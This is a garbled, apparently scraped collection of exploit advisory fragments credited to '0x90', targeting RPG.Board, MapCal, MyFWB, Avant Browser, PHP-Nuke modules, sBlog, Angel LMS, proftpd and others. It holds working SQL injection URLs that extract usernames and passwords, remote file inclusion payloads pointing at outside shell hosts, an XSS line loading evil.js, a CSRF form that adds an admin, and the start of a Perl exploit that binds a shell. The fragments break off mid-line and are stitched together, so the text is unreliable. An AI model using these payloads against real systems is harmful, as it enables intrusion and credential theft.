[~] RPG.Board = 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: http://rpgmaster.de/viewtopic.php?f=25t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit
SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: MapCal - The Mapping Calendar
[~] site: http://mapcal.sourceforge.net
[~] Vulnerability Class: SQL Injection
[~] Exploit:
http://localhost/cms/index.php
MyFWB 1.0 Remote SQL Injection
Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar
Username:
http://host/MyFWB/?page
!--
- Product : Avant Browser
-
- Version : 11.7 Build 9
-
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
--
script
var s=String.fromCharCode(257);
var a=; var b=;
for(i=0;i1024;i++){a=a+s;}
for(i=0;i1024;i++){b=b+a;}
var ov=s;
for(i=0;i28
Inclusion Vulnerabilities
[~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip
[~] Founder: 0x90
[~] HomePage: www.0x90.com.ar
[~] Public: http://0x90.com.ar/Advisory/20080321.txt
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] PoC:
http://[host]/[path]/index.php?skin
#!/usr/bin/perl
#Product: PHP-Nuke Module Advertising
#BugFounder: 0x90
#HomePage: WwW.0x90.COM.Ar
#Problem: Blind SQL Injection
use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;
my $host = http://[url]/modules.php?name=Advertising;;
my $useragent =
#Author: 0x90
#HomePage: WwW.0x90.CoM.Ar
#Contact: Guns[at]0x90[dot]com[dot]ar
#Vendor: IDMOS v1.0 Alpha
#Download: http://ufpr.dl.sourceforge.net/sourceforge/idmos/idmos.zip
#PoC
http://[target]/administrator/admin.php?site_absolute_path=http://shell?
http://[target]/administrator
!--
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
-
- Product : Php Nuke add-on MS TopSites
-
- Website : http://phpnuke.org/
-
- Download: http://www.weblord.it/downloads/nuke65/addons/MS_TopSites_ITA.zip
-
- Problem : Edit Exploit
!--
- Product : sBlog
-
- Version : 0.7.3 Beta
-
- Website : http://www.sblog.se
-
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
-
- Problem : Cross Site Request Forgery Vulnerability
-
- Sumary : sBlog has, by default, no CSRF
!--
- Product : AGTC-Membership system
- Version : 1.1a
- Website : http://www.agtc.co.uk
- Author : 0x90
- HomePage : WwW.0x90.CoM.Ar
- Contact : Guns[at]0x90[dot]com[dot]ar
- Problem : Admin Added Access.
--
form name=form1 method=post action=http://[target]/adduser.php;
h3 align
Micro Login System v1.0 (userpwd.txt) Password Disclosure
Vulnerability
#Affected Software: Micro Login System v1.0
#Download: http://www.hotscripts.com/jump.php?listing_id=67504jump_type=1
#Bugfounder: 0x90
#Contact: Guns[at]0x90[dot]com[dot]ar
#homepage: WwW.0x90.CoM.Ar
#[+]Exploit: http
./modules/mod_swmenufree/styles.php); // -- RFI
preview.php:13: require_once($mosConfig_absolute_path
./modules/mod_swmenufree/functions.php); // -- RFI
#Expl0it:
http://www.site.com/components/com_swmenufree/preview.php?mosConfig_absolute_path=http://scriptkiddie.com/c99haxor.txt?
#Contact: Guns
# sBlog 0.7.3 Beta XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn mail: [EMAIL PROTECTED]
# in blog
http://host/blog/search.php
# use
'//script src=http://yoursite.com/evil.js
# Welcome to the jungle!
# Angel LMS 7.1 Remote SQL Injection
# by Guns
#All User Accounts#
http://[Angel Root
Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--
#Account Passwords#
http://[Angel Root
Directory]/section/default.asp?id='%20union%20select%20top%201%20password
#Critical Status:High
#Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#confkey-Password
#confvalue-Username
#Table:config
#http://host.com/path/?mode=viewalbum=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
#Critical Status:High
#Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#confkey-Password
#confvalue-Username
#Table:config
#http://host.com/path/?mode=viewalbum=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
#!/usr/bin/perl -w
# Local Exploit
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from
proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh
17 matches
Mail list logo